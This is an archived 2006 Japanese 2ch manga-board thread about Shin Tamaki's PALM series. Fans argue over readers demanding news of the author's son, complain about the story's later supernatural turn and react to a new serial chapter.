不用意に家族のことをネタにした漫画家がそもそも脇が甘いとは思うけど、ネタにされた
子供ももういい年した大人でしょ? 子供側からしたら「今こいつが何やってんのか
公表しろヨ!」なんて読者が要求するのは迷惑だし恐怖だと思う。

芸能人に私生活はないから、みたいなノリだとは思うけど、それって百歩譲っても
漫画家本人までのことじゃないかなー……うーん、自分だったらイヤだけどな。

535 :花と名無しさん:2006/12/20(水) 13:12:06 ID:???0
>>532ごめん被った。

536 :534=535:2006/12/20(水) 13:13:18 ID:???0
535は>>533宛の間違いです……orzナニヤッテンダ

537 :花と名無しさん:2006/12/20(水) 18:32:30 ID:???0
>>528
>作者がオーストラリア行き時点で吐露した以上

これ意味不明なんだが、公式ページか何かで発言したの?

>>533
「パーム」なんて今や完全に私小説じゃん。「青また青」に至っては息子までネタにしている。
興味を持つことがそんなに悪いことなのか? だったら最初からペラペラしゃべらなきゃいい。
破れたハートを売り物にしているのは作者自身でしょうに。それを都合が悪くなると
プライバシーとか人権ってなにそれwww

538 :花と名無しさん:2006/12/20(水) 18:40:40 ID:???0
オバチャン的好奇心も結構だけど、最低限の恥は知ろうね。
私小説=ドキュメンタリーじゃないし、
私小説発表=個人情報全公開無条件承諾でもない

539 :花と名無しさん:2006/12/20(水) 18:52:35 ID:???0
>>537
>興味を持つことがそんなに悪いことなのか? だったら
>最初からペラペラしゃべらなきゃいい。

こう言う物言いが平然とできる読者がいると、自分がもし作家の
立場ならこれ以上話題に出すのを躊躇う。
公人にプライバシーはねえんだよ最初から喋ってんなら最後まで
全部漏れなくばらせやゴルァ!が当たり前的な思考が、なんだか
気持ち悪いし怖い。こういう考え方って当たり前なのか?

540 :花と名無しさん:2006/12/20(水) 19:13:53 ID:???0
当り前じゃないと思う。
自分は「本人がネタにもしてないなら子供は放っといてやれよ」な口。

541 :花と名無しさん:2006/12/20(水) 19:26:00 ID:???0
>>537  
作者の意見とこのスレの意見ごっちゃにしてない?
プライバシー云々ってのはこのスレの意見でしょう。
作者に聞いてみて、プライバシーと断わられたなら別だけど。

破れたハートを売り物にしている     =作者
それを都合が悪くなると          =誰の都合?
プライバシーとか人権ってなにそれwww=このスレへ

542 :花と名無しさん:2006/12/20(水) 19:33:50 ID:???0
だから最初から中途半端な自分語りしなきゃいんだよな>作者

「青また青」って完全に作者の理想の姿を描いているような気がするが、今となっては
かなり気持ち悪い感じがする。

あと、自分も
>作者がオーストラリア行き時点で吐露した以上
これには興味を持ったけど、いけないことなの? どう考えても公式ページか
インタビューでの発言でしょ? 知りたいと思うことが下世話なオバサン趣味なの?

543 :花と名無しさん:2006/12/20(水) 19:38:19 ID:???0
537の考え方って女性専用車両にのらない女には痴漢してもいいのか、とか言い出す奴と同じだと思う



544 :花と名無しさん:2006/12/20(水) 19:40:33 ID:???0
だから、私生活を下敷きにした作品=全部作者の実話体験談、
みたいな思い込みはやめようよ。ね。

>>542
>作者の理想の姿を描いているような気がするが、今となっては
>かなり気持ち悪い
なんて、ほとんど言いがかりじゃないか?
「青〜」はそもそもニッポンの話でも漫画家の話でもないだろ…

545 :花と名無しさん:2006/12/20(水) 19:56:50 ID:???0
だよなぁwww
ところでオーストラリア行きがどうこうってのは、
作者個人サイトでの話題じゃなかったっけ>ソース
違ったらスマソけど、作品に関係ないことではあるし
「知りたい派」もちょっと執拗すぎな気がするよ

546 :花と名無しさん:2006/12/20(水) 21:01:11 ID:???0
ところで、ここの住人は、昔からあったジェームスからカーターへのセクハラは、どう思っているんだろう・・・
小説版「あるはずのない海」からすると、相当前から構想にはあったはずだが

547 :花と名無しさん:2006/12/20(水) 21:27:16 ID:???O
>>544
おいおい、「青また青」はどう考えても作者と息子がモデルだろうに。粘着もウザイが
そういう見えないフリも香ばしいぞ。

なんか必死で移住当時の発言を隠蔽したいヤツがいるみたいだが
作者自身の発言を知りたいというのがどうしていけないんだ?
何か隠したいようなイタタタ発言なのか?

548 :花と名無しさん:2006/12/20(水) 21:34:21 ID:???0
>>547
「全部」・・・たまぴんの母ちゃんって米軍関係者?

549 :花と名無しさん:2006/12/20(水) 21:41:56 ID:???0
>>548
547の発言のどこに「全部」の一言があるんだ?

550 :花と名無しさん:2006/12/20(水) 21:46:52 ID:???0
>>547の痛さにワロタ
これだけ皆に諭されててもまだ言ってるしこの人……オバチャン言われても
これはしょうがないやハハハ……


551 :花と名無しさん:2006/12/20(水) 21:52:50 ID:???0
>>547
>「青また青」はどう考えても作者と息子がモデル

自らの過去をモデルにした創作物≠実話体験談ドキュメント

実話をモデルに自分と息子の過去を漫画で公開したんだから
息子の「その後」も公開しる!てのは読者心理とかかわいい
好奇心とかいうレベルをすっ飛ばしてイッちゃいすぎですよ。
ほどほどにしとけよ……マジでストーカー臭するよ。

552 :花と名無しさん:2006/12/20(水) 21:53:37 ID:???O
むしろ>>548みたいに他人には見えない文字列を持ち出すような奴の方が痛いだろ。
>>547のどこに「全部」なんて書いてある?

オカルト展開の影響かい?w

553 :花と名無しさん:2006/12/20(水) 21:53:56 ID:???O
なんじゃこの流れ。
そんなに粘着するような御大層な発言なのか?
自分が知ってるのは、移住後の椰子の柱で息子の友達に
作者の仕事はスパイだと思われていたと書いてたのしか知らんが。

554 :花と名無しさん:2006/12/20(水) 21:53:59 ID:???0
>>547
>隠蔽




( ゚Д゚)

555 :花と名無しさん:2006/12/20(水) 21:55:10 ID:???0
情けない

556 :花と名無しさん:2006/12/20(水) 21:55:37 ID:???0
>>552
バカだなあ・・・>544を見ることも出来ないのか?

557 :花と名無しさん:2006/12/20(水) 21:57:08 ID:???0
こういうときに携帯だと、いわゆる会話のキャッチボールが出来ないのね

558 :花と名無しさん:2006/12/20(水) 21:59:28 ID:???0
>>552

>>547
>なんか必死で移住当時の発言を隠蔽したいヤツがいるみたいだが

↑じゃこれなんかも立派にオカルト展開の影響だな?w

559 :530:2006/12/20(水) 22:09:26 ID:???0
なんかキモイ展開になってるね。自分は>>528の中の
>作者がオーストラリア行き時点で吐露した以上
という部分に関して知りたかったなんだけど、それが作者の息子さんへの
ストーカー行為になるわけ? >>528の書き方だと公式ページや本誌の
インタビューか何かでの発言だと思ったから聞いただけなんだけど、
ID出ないからって他の人の発言まで背負わされて粘着扱いされたら
たまらないよ。

仮にその“吐露した”言葉がイタタタで、今は削除されているとかなら
そう書けば済む話じゃないの? 分からないから他の人も興味を持って
尋ねたんだろうし。

560 :花と名無しさん:2006/12/20(水) 22:12:02 ID:???0
>>556
>544の「青〜」はそもそもニッポンの話でも漫画家の話でもないだろ…って
文章への返答が>547だろ。
>547は「私生活を下敷きにした作品=全部作者の実話体験談」を
肯定してるわけじゃないよ。会話の流れをよく読め。

561 :花と名無しさん:2006/12/20(水) 22:13:54 ID:???0
>仮にその“吐露した”言葉がイタタタで、今は削除されているとかなら

妄想キター
この人自分では事情も確かめずにひとりで妄想してレスしてるよどうしようww

562 :花と名無しさん:2006/12/20(水) 22:17:23 ID:???0
>>560
そりゃ、悪かったね。

>「青〜」はそもそもニッポンの話でも漫画家の話でもないだろ…

という感じで、引用されていなかったんで勘違いしてしまいましたよ

563 :花と名無しさん:2006/12/20(水) 22:22:35 ID:???0
>>560

>おいおい、「青また青」はどう考えても作者と息子がモデルだろ
>うに。粘着もウザイが
>そういう見えないフリも香ばしいぞ。


根本的なことを訊いていいか?

作品が作者と息子がモデルのものだったら、それで何なの?
言及されていない「息子のその後」をしつこく知りたがることの
どういう論拠になるんだ?w

564 :花と名無しさん:2006/12/20(水) 22:24:15 ID:???0
>>563
最後の三行に対して

国民の知る権利に基づいて・・・じゃないかな

565 :花と名無しさん:2006/12/20(水) 22:25:38 ID:???0
「創作物」と「実話再現ドキュメンタリー」の区別がついてない
厨房ちゃんが混じってるみたいですね

ウェブによく転がってる心霊話や性体験談とか、全部鵜呑みにして
そのまま信じるタイプだな。霊感商法とかに気をつけてねw

566 :花と名無しさん:2006/12/20(水) 22:31:40 ID:???0
タスク追っかけなのにそうと言えないツンデレ野郎ですかw

567 :547:2006/12/20(水) 22:49:24 ID:???0
>>560
代弁してくれてありがと。

>>563
>作品が作者と息子がモデルのものだったら、それで何なの?

それ以上でもそれ以下でもないけど?

>言及されていない「息子のその後」をしつこく知りたがることの
>どういう論拠になるんだ?w

別にそんな主張はしてないよ。粘着君とは関係ない。

568 :花と名無しさん:2006/12/20(水) 22:53:32 ID:???0
>>567
あせって携帯から送るから・・・

569 :花と名無しさん:2006/12/20(水) 22:54:50 ID:???0
>>561
>この人自分では事情も確かめずにひとりで妄想してレスしてるよどうしようww

あんたも香ばしいな。>>542も書いてるけど知らない人間が「どこに書いてあったの?」と
尋ねても誰も答えないくせに、今度は妄想扱いですか。つーかID出ないとあんたみたいに
誰でもかれでも同じ人間に見えるバカが出てきて困るよ。

570 :560:2006/12/20(水) 22:55:12 ID:???0
>>563
>548の「全部」発言についておかしいと思ったからレスつけただけ。
作品が作者と息子がモデルだって事に同意しただけで
「息子のその後」をしつこく知りたがってるのは他の人。
会話の流れをちゃんと読んでください、本当に。


571 :花と名無しさん:2006/12/20(水) 22:56:01 ID:???0
>>567
ワロスwwww

572 :花と名無しさん:2006/12/20(水) 22:56:10 ID:tIWUBOD60
>>568
お前も煽るな。

573 :花と名無しさん:2006/12/20(水) 22:57:43 ID:???0
>>570
ワロスwwww 尻尾が見えてるぞw

574 :花と名無しさん:2006/12/20(水) 22:58:20 ID:???0
>>570
要するに、自分の解釈が絶対で、他人の解釈と合致しなかったら、相手が間違っていると言ってただけなのね

575 :花と名無しさん:2006/12/20(水) 22:59:35 ID:???0
それは粘着してる人じゃないの?

576 :花と名無しさん:2006/12/20(水) 22:59:54 ID:???0
イタタタな作者のスレだけにファンもイタタタなヤシが多いねー。誰が誰だかわからないくせに
妄想炸裂で勝手に噛み合ってるわwww

それで結局、作者が吐露したとかいう発言は誰も質問者に教えてやらないんだろ?底意地悪いねぇ。

577 :花と名無しさん:2006/12/20(水) 23:00:01 ID:???0
>>568
>>573
ヲィヲィ本人まだ気づいてないんだから親切に教えてやるなよw

578 :花と名無しさん:2006/12/20(水) 23:01:46 ID:tIWUBOD60
>>573
バーカ、そういうハッタリは滑稽なだけなんだよ。>>570氏カワイソス

579 :花と名無しさん:2006/12/20(水) 23:04:00 ID:???0
>>576サンドバッグになって顔赤くするのもわかるが少し頭を冷やせw
そもそも「吐露したよ」発言をしてるのは>>528の「息子のその後の
個人情報出せやゴルァ興味津津ハアト」と言ってる側ですがなw

580 :花と名無しさん:2006/12/20(水) 23:04:59 ID:???0
初期パームみたいに、様々な意見がぶつかり合う・・・いい傾向じゃないかな?


全然、関係ないけど。「あるはずのない海」がOVAになる計画は、ポシャって良かったことだったのかな

581 :花と名無しさん:2006/12/20(水) 23:06:04 ID:???0
>>578
お前と「570氏」とやら以外は大概の人がわかってるよ。w

582 :花と名無しさん:2006/12/20(水) 23:06:57 ID:???0
>>579
結局、吐露云々は根拠のない発言ということ?
それなら分からないで聞いている人にそう教えてあげればいいのに。どうしてここまで
互いに罵り合ったているのか訳わからない。

583 :花と名無しさん:2006/12/20(水) 23:10:03 ID:tIWUBOD60
>>581
新たな妄想キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

584 :花と名無しさん:2006/12/20(水) 23:10:44 ID:???0
>>582
スレ嫁

585 :花と名無しさん:2006/12/20(水) 23:11:46 ID:???0
>>580
何かトラブルがあったらしいし、アニメ化がふさわしい作品とは思えないな。小説化は
さらにふさわしくないがw

586 :花と名無しさん:2006/12/20(水) 23:13:25 ID:???0
>>528の「トロがどうたら」は根拠のない妄言
このスレの連中は上から目線で意地の悪い奴が多い

以上でFA?

587 :花と名無しさん:2006/12/20(水) 23:13:44 ID:???0
なんかOVA化にあたってモノスゴイこだわり(ハイレベル作画・
実写映画並画質音質声優ランク他)を要求して喧嘩別れ……、
とかな気がする。なんとなく性格的に。妄想だけどw

588 :花と名無しさん:2006/12/20(水) 23:14:34 ID:???0
どうでもいいよ、こんな糞漫画。作者に合わせてファンまでどんどん痛くなってるし。

589 :花と名無しさん:2006/12/20(水) 23:14:55 ID:???0
>>585
う〜む
声は勝手に、カーター=鈴置洋孝、ジェームス=速水奨、アンディ=井上和彦と妄想してたな。

あ・・・キモイと思った方、お手数ですが個別あぼ〜ん等をしてくださいませ

590 :花と名無しさん:2006/12/20(水) 23:16:59 ID:???0
>>586
そりゃ、お前さん。こんなカルト漫画のファン続けてるのが、痛くて自尊心の高いというのは当然だろ

591 :花と名無しさん:2006/12/20(水) 23:23:29 ID:???0
自演擁護に心当たりがあって、>>577が???な人は、
書込みした自分のスレ番と名前のスレ番と各IDの尻尾を、
もう一度丁寧に見直してみることをお勧めする。
それから、半年ROMれ。

592 :花と名無しさん:2006/12/20(水) 23:44:31 ID:???0
あからさまにオチョクリだすと、誰も何もいわなくなるのな

593 :花と名無しさん:2006/12/20(水) 23:46:20 ID:???0
というか馬鹿をつついて遊ぶのに飽きた

594 :花と名無しさん:2006/12/21(木) 00:50:51 ID:???0
なんかオーストラリア行きの事で揉めてるようだけど、
作者がウィングス誌上で公言したのは確か。その時の文章をかいつまむと

息子がミュージシャンになりたがっているから、
息子の為に英語圏に移住しなければならない。
しかしアメリカは居住が許されなくて、
我々にはカナダとオーストラリアしか選択肢が無くて、
熟考の末オーストラリアにした、と。しばらくは引越しで忙しい。

595 :花と名無しさん:2006/12/21(木) 01:09:23 ID:???0
というかゴシップや噂話が好きって人は
世の雑誌を見てもわかるように別に珍しくないんだから、
息子どうしたよ!今何やってんだよ!みたいに言うならまだしも、
「作品で生活の一端を見せたからには最後まで言って当然。
読者に知らせるべき!隠す方がおかしい」
というように当然の権利みたいに言うから変なんだよ。

596 :花と名無しさん:2006/12/21(木) 05:43:26 ID:???0
なんかオバチャンに迂闊にパンの耳とかを投げ与えたら
袋ごとよこせ!1斤丸ごとよこせ! 一度くれたら毎日
欠かさずよこせ!!みたいに迫られますた、みたいな感
じで怖い。
作品共同執筆とかしてるわけでもなし、息子の動向とか
どうだっていいじゃんと思うのに「青また青で息子をネ
タにしたじゃん!」「チラ書きしたら最後まで教えろや!
でなきゃ最初から黙ってろ」って何このヒートアップ…

芸能人の私生活は覗かれて当然な思考の、ワイドショー
しっかり支えてる層の人なのだな。

597 :花と名無しさん:2006/12/21(木) 06:03:08 ID:???0
その後を教えろ派の本音は単に

子供のワガママで海外移住なんて何様デスカー!?
どうせ挫折したんだろプゲラ は っ き り 
 さ せ ろ や ゴ ル ァ

のような気がするんだが

598 :花と名無しさん:2006/12/21(木) 06:11:23 ID:???0
まさにワイドショー の原理

599 :花と名無しさん:2006/12/21(木) 07:15:07 ID:???0
昨日>>528に便乗して質問した者だけど、質問の意図を勝手に曲解した挙げ句に
>>591みたいに中途半端な知識で鬼の首とったみたいに自演だなんだと騒ぎたてる
馬鹿たちのおかげで楽しませてもらったわw

携帯とPCによるIDの違いくらいわかるっつーの。本当に作品の影響か上からものを見る
高慢なオバサンたちが多いな。

ただ一人だけ、私の自演扱いされた>>570さんには申し訳ないと思ってるよ。じゃあね。

600 :花と名無しさん:2006/12/21(木) 07:38:44 ID:???0
>>597
なんか昨日からの流れ見てたけどさあ、明らかに荒らしの>>528はともかくとして
事情を知りたくて質問した人間を小馬鹿にしてストーカー扱いしている連中もどうかと思ったよ。
「パーム」のファンらしいと言えばそうかも知れないけどね。

601 :花と名無しさん:2006/12/21(木) 07:52:34 ID:???0
>>599
今ごろ言い訳カッコ悪い

602 :花と名無しさん:2006/12/21(木) 07:57:03 ID:???O
自分も携帯が主なんだけど、2ちゃんでは携帯バカにする人が多いよね。確かにもろ厨房な
書き込みする人も少なくないけど。

JBなら「そんなことは関係ない」とか言ってくれるんだろうな。はい妄想です。

603 :花と名無しさん:2006/12/21(木) 07:58:16 ID:???0
>>600

「作品について」質問してる人だったら、誰もストーカー
呼ばわりされたりなんてしなかったと思うけど。


604 :花と名無しさん:2006/12/21(木) 07:59:51 ID:???0
知りたいのはおかしくないよ。
権利のように言うのがおかしいだけ。
あと初手から叩き口調じゃ反感買って当然。

それにここでいくらギャンギャン言おうと誰も知らないんだよ?
本当に知りたいならメール出したほうがいいんじゃない?


605 :花と名無しさん:2006/12/21(木) 08:03:02 ID:???0
そうだよね、スレでああだこうだ言ったってスレ住人も知ら
ないのに隠すとか言われてるしw 目ウロコだ。

最近、作家と作品を分けて考えられる読者が少なくなってきた
というか……分けて考えられないのって有名人ストーカー系の
思考パターンだよなー。

作品と無関係の私生活・本人ですらない家族の現況公開キボンヌ・
どうせ元ネタに使ったんだから公表したっていーべ・それとも
今さら隠蔽したいのプププ?・etc

スレ読んでて強引論理の数々にウヘエな気分でしたよ
自分だったらこんなこと他人に言われたらキモチワルいよ。
しかも諭してる人の意見にはまるで聞く耳もたないし……

606 :花と名無しさん:2006/12/21(木) 08:39:07 ID:???0
純粋にフシギなんだが"その後"を知ってどうするんだろ?何か意味あんの?

607 :花と名無しさん:2006/12/21(木) 09:01:36 ID:???0
>>606
最終章「タスク」の有り様を見届けたいんだろ。

608 :花と名無しさん:2006/12/21(木) 09:09:36 ID:???0
自らの過去をモデルにした創作物≠実話体験談ドキュメント

609 :花と名無しさん:2006/12/21(木) 09:10:10 ID:???O
最終章のタイトルを知った時から、期待と不安が入り混じっています。最近の流れを見てると
不安の方が大きいな。どうか「終わってみたら壮大なアイタタタ漫画でした」なんてことに
ならずに無事着地してほすぃ。

610 :花と名無しさん:2006/12/21(木) 09:12:46 ID:???0
ドラマで悪役を演じた女優宛にカミソリとか送りつけるファン

みたいなのを連想する>現実と漫画混同してる連中

611 :花と名無しさん:2006/12/21(木) 09:15:44 ID:???0
>>610
永井豪は「カミソリありがたく皆で使わせていただきました」ってさ。w

612 :花と名無しさん:2006/12/21(木) 09:28:10 ID:???O
後藤隊長は磁石で確認して回避してたな>アニメ版。まあこのスレもみんなで幸せに
なりたいね。JBにも(無理か)

613 :花と名無しさん:2006/12/21(木) 09:51:08 ID:???0
おばちゃんは覗きが大好き!
でFA

614 :花と名無しさん:2006/12/21(木) 10:27:59 ID:???0
もう消えた人をいつまでも叩くこともないよ。

しかし最終回はどう転んでも阿鼻叫喚て感じだなぁ。

615 :花と名無しさん:2006/12/21(木) 10:39:57 ID:???0
どの辺でこうなっちゃったのかなぁ……と考えると
分岐点て星の歴史前後?ASP?
愛でなくも部分的にはよかったんだがジョゼの超常から
どんどん狂っていって今の路線にorz

616 :花と名無しさん:2006/12/21(木) 11:07:33 ID:???O
前にも誰かが書いてたと思うけど、超常現象自体は最初からあったし、別に悪い要素では
ないと思う。だが近作ではあまりにも神がかり過ぎていて、しかもそれが物語の進行上も
大きなウエイトを占めているためにトンデモな印象が強くなってしまった。あとは強引な
キャラ退場とかも不安をあおるんだよなあ。

617 :616:2006/12/21(木) 11:12:48 ID:???O
あと、息子さんの名前をつけたのと最終章のタイトルを決めたのは、どちらが先なのかな。
作品タイトルが先なら、作者の中ではもう描くべき内容は固まっていて、きちんと着地
してくれるんじゃないかという期待も高まる。

618 :花と名無しさん:2006/12/21(木) 11:14:23 ID:???0
うん、超常自体をNG言ってるわけじゃない。
ただ昔のはせいぜい第六感的な程度だったけど
ジョゼとか黒ライオンまでイッちゃうと、ちょっと
長年ファンの自分でもついていけなかった。
周囲にいた熱烈パーム好き友たちがあれよあれよと
離れたのもこの時期。

あの世界観にしてもキャラにしても、バランス感覚の
絶妙さが売りだったのになあ。今はもう……orz

619 :花と名無しさん:2006/12/21(木) 11:34:32 ID:???O
>>618
自分は黒ライオンの時の「銃はすべて不発」に、自然への畏敬や野生の力みたいなものを
そんな安っぽくしか描けないのかと失望した。

620 :花と名無しさん:2006/12/21(木) 12:16:42 ID:???O
やや細かいことだが、鉄格子ねじまげ、サロニーの手、掌から光もあったね

銃の不発はあまり巧い見せ方じゃないね、確かに

621 :花と名無しさん:2006/12/21(木) 12:25:54 ID:???0
>>620
サロニー手はけっこう良かったと思うんだよね。超常と言っても
オバケ的だったしw 光は……どうだろう。
鉄ねじ曲げみたいに物理的作用にまで及ぶとちょっと微妙か。

622 :619:2006/12/21(木) 12:27:45 ID:???O
>>620
個人的には「サロニーの手」まではそれほど違和感なく受け入れられた。死んでもなお
行き場のない魂をJBが受け入れるという描写には感動すらした。

今にして思えば、あれが私の許容範囲の限界だったんだな。

623 :花と名無しさん:2006/12/21(木) 12:45:27 ID:???0
>>622ハゲド
やっぱバランスというか比重の問題なんだろうなあ……
>>620読んで、大好きだった頃のパーム思い出してほんのり哀しくなった。

624 :花と名無しさん:2006/12/21(木) 15:33:49 ID:???0
JBが会ったことのないアンディの夢を何度も見るとか、
鉄格子を曲げるとか、サロニーの手が出るとかは
人と人との強固な繋がりが具現化したような感じだったから、
納得できる人が多かったんだと思う。

625 :花と名無しさん:2006/12/21(木) 15:59:33 ID:???O
ASPまでは、人間同士のドラマ
愛でなく以降は、人間と自然の(納得できないにせよ)ドラマ

なんだな。作者が書きたかったテーマは

626 :花と名無しさん:2006/12/21(木) 16:24:07 ID:???0
ドラマを描くために不要な展開やキャラとかをどんどん切り捨ててった
あげくに、ついでに邪魔なので読者も切り捨てました、みたいな


627 :花と名無しさん:2006/12/21(木) 16:43:25 ID:???O
>>626
ちょwwww

628 :花と名無しさん:2006/12/21(木) 17:05:50 ID:???0
いやマジこれ掲載誌がウィングスだし雑誌初期からの一応は
大御所(?)だから何とか通るけど普通無理だと思うぞ…
もう編集側は止められないんだろうなぁ…とほんのり

某学園道中記みたいに絵そのものが激劣化してorzじゃないだけ
まだマシかも知れんけど。

629 :花と名無しさん:2006/12/21(木) 17:23:46 ID:???0
>>626
ワロタ(;´Д⊂)

630 :花と名無しさん:2006/12/21(木) 19:00:57 ID:???O
編集部には止められる人がいないんだろうね。
小説で掲載なんて、編集さんよく耐えてるなあと思う。

>>628
学園道中記_| ̄|○人○| ̄|_ナカーマ

631 :花と名無しさん:2006/12/21(木) 19:13:24 ID:???0
不要な展開って例えば?


632 :花と名無しさん:2006/12/21(木) 19:18:14 ID:???0
脇キャラのストーリーとかじゃね?
アンジェラとかまさに不要扱いでサクージョされたイメージあるけど。

633 :花と名無しさん:2006/12/23(土) 09:53:21 ID:???0
あれ? ここ懐かし漫画板だよね?
PALMシリーズは何年か前にASPってので終わったんだよ。
似た絵柄の人が同人出してるけど、中身が全然違うから、あれ
悪質パクリだよね……本人訴えれば勝てるんじゃないかな?


634 :花と名無しさん:2006/12/23(土) 20:50:07 ID:???0
そうだったのか!








                               orz

635 :花と名無しさん:2006/12/23(土) 23:20:19 ID:???0
だから言ったのだ・・・

『伸たまき★ナッシングハート、胸の太鼓、あるはずのない海、スタンダード・デイタイムズ、星の歴史、オールスタープロジェクト★PALM』
を『懐かし漫画板』でスレ立てせよと・・・

636 :花と名無しさん:2006/12/23(土) 23:36:40 ID:???0
…昔からのファンとしては、第一話は「お豆の半分」しかありえないわけだが。
「星の歴史」で「お豆」「海」とリンクが繋がったあたりは読んでてゾクゾクしたよ。


最終回はもちろんASPラストでイナフだ。

637 :花と名無しさん:2006/12/23(土) 23:38:35 ID:???0
>633
そっかー、そう言えば作者の名前も違うしね。

638 :花と名無しさん:2006/12/23(土) 23:41:41 ID:???0
>>635
スレ名長過ぎw

639 :花と名無しさん:2006/12/23(土) 23:47:37 ID:???0
>>638
ならば、どのタイトルを削ればよいというのだ?答えよ!

640 :花と名無しさん:2006/12/23(土) 23:48:19 ID:???0
作者の公式サイトに行ってみて、びっくりした。
自分の生家の家庭環境から何から何までこんなところに書くかね。
誰が見るかわからないのに。

641 :花と名無しさん:2006/12/24(日) 00:53:50 ID:???0
スレ立てて、「愛でなく」以降の存在を知らないふりで続けるとかはどうだろう
それ以降の話題を出したら電波扱い
「ハァ?パラレルワールドの住人ですか」とか

642 :花と名無しさん:2006/12/24(日) 04:38:52 ID:???0
>>639
「伸たまきスレ」でいいんじゃないの?

643 :花と名無しさん:2006/12/24(日) 07:07:06 ID:???0
>>642
ソレダ!

644 :花と名無しさん:2006/12/24(日) 08:06:31 ID:???0
略して、『NH、胸太、あ海、SDT、星歴、ASP』

645 :花と名無しさん:2006/12/24(日) 08:13:08 ID:???0
>>644
『あqwせdrftgyふじこlp;@:』みたいだなw

646 :花と名無しさん:2006/12/24(日) 08:16:34 ID:???0
>>638
「屈折する星くずの上昇と下降、そして火星から来た蜘蛛の群」より長いなw

647 :花と名無しさん:2006/12/25(月) 00:19:11 ID:???O
>>646
ジギースターダスト好きだったなあ。今のボウイも嫌いじゃないけど…。
若い頃の作品の方が評価されるのは芸術家の宿命かな?漫画家もミュージシャンも。
全盛期に世に出した自身の傑作を越えるものを、その後新たに創るってすごく難しいんだろうね。

648 :花と名無しさん:2006/12/25(月) 07:48:56 ID:???0
>>647
デビュー作がヒットしすぎて、それがプレッシャーになって消えていく創作者も
珍しくないですね。画家やクラシックの作曲家などは老齢に入ってからの作品の方が
評価されたりする場合が多いわけですが。

「パーム」はシリーズ化しているものの、やはりこれだけ長期連載になると絵柄を
含めて大きく変化しているし、エピソードごとに考えると初期の方が傑作揃いだったと
個人的には思いますね。まだ2作あるから断定しちゃいけないんだろうけど。

649 :花と名無しさん:2006/12/25(月) 08:19:24 ID:???0
萩尾青池木原大島等々、凄く仲いいけど。

この人と仲のいい女性漫画家って誰ですか?

650 :花と名無しさん:2006/12/25(月) 10:54:37 ID:???0
岡野玲子だと思う。確か専門学校も同じだし、ぱふの特集で読んだ。



651 :花と名無しさん:2006/12/25(月) 11:31:05 ID:???0
なんか電波飛ばし合ってる感じ

652 :花と名無しさん:2006/12/25(月) 16:23:21 ID:???O
確かにw

653 :花と名無しさん:2006/12/25(月) 16:56:14 ID:???O
35年組は良くも悪くも個人主義って気がする。

654 :花と名無しさん:2006/12/25(月) 17:02:07 ID:???0
流れ豚切り&チラ裏。

この作者って
「別れは突然、なんの前触れもなく訪れるもので、自分の都合・心の準備なんかおかまいなし」
と強く激しく思った経験(いいか悪いかは置いといて)があるんだろうなーと推察できるんだが、

そんなのこっちも十二分に知っている。
自分がそうだったから、お前もそうだろ。
知らないならそういうものなんだ、みたいに感じられて嫌だ。

どうしても言いたいんなら、もうちょっとうまくフォローしろよ。
それで食っている「プロ」なんだろ。

と、アンジェラ退場で思った。

655 :花と名無しさん:2006/12/25(月) 17:42:38 ID:???O
「別れ…」のコメント(編集の注?)はあったけど、アンジェラ退場も一回目を小説にしたのも本人が生きてる間に終らせる為の苦肉の策じゃないかと思った。
描くこと自体が目的から、完結させることが目標になった辺りから変わってしまった気がする。

656 :花と名無しさん:2006/12/25(月) 19:55:02 ID:???0
>>650
そうなんですか。ありがとう。
よりによって御大手塚の息子がダンナで、生活安泰の岡野氏ですか・・・

>>654
同意。自分だって突然親は死ぬわ友は死ぬわで、
そんなの誰でも嫌というほど思い知ってる、と感じますた。

657 :花と名無しさん:2006/12/25(月) 20:30:27 ID:???0
その「誰でも嫌というほど思い知ってる」ことを、
作品として形にできるのが作家なんじゃないか?

伸たまきはそれができる人なんだと、
少なくとも『あるはずのない海』を読んだ時は思ったのだけれど。
(そして、実は今もまだ期待を捨ててはいない・・・)

658 :花と名無しさん:2006/12/25(月) 21:25:05 ID:???0
もう獸木野生だから・・

659 :花と名無しさん:2006/12/25(月) 22:30:37 ID:???0
JBが〜!!

660 :花と名無しさん:2006/12/25(月) 22:53:05 ID:???0
ゲロッパのひとですね。合掌

661 :花と名無しさん:2006/12/29(金) 12:49:45 ID:???0
新作漫画第一話、良かったよ〜
そういえばカーターって離人症患ってたんだよな…。
神父に「母に必要なのは教会より医者だと思う」と遠慮がちながらズバリ言えちゃう少年カーター萌。

もしカーターがもっとずっと幼い頃レイフ伯父に引き取られていたらどうだったろうとか思っちゃった。
ジェームスも実父母の愛情は知らなかったけれど、父不明母死別という已む無い境遇だったから
父母同居のカーターとは状況が違うね。

もっとゆっくりエピソードを展開してほしいような、早く先が知りたいような…。


662 :花と名無しさん:2006/12/29(金) 16:23:32 ID:???0
ほんと結構よかった
ジョゼがいないから?

663 :花と名無しさん:2006/12/29(金) 17:16:30 ID:???0
その一点につきるとオモ

664 :花と名無しさん:2006/12/29(金) 17:39:07 ID:???0
つきるんかい…

665 :花と名無しさん:2006/12/29(金) 23:28:32 ID:???0
>>661
淡々と進んで展開は早そう。
1話で10年経ってるし。

まあその方がいいかも。
若カーターだからと数年ぶりにWINGS買ったんだが、
獣木センセーの浮きっぷりに驚いたよ。
完結予定の2011年まで連載続けさせてもらえるのかが心配だ。

666 :花と名無しさん:2006/12/29(金) 23:46:04 ID:???0
ジョゼ?

165 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)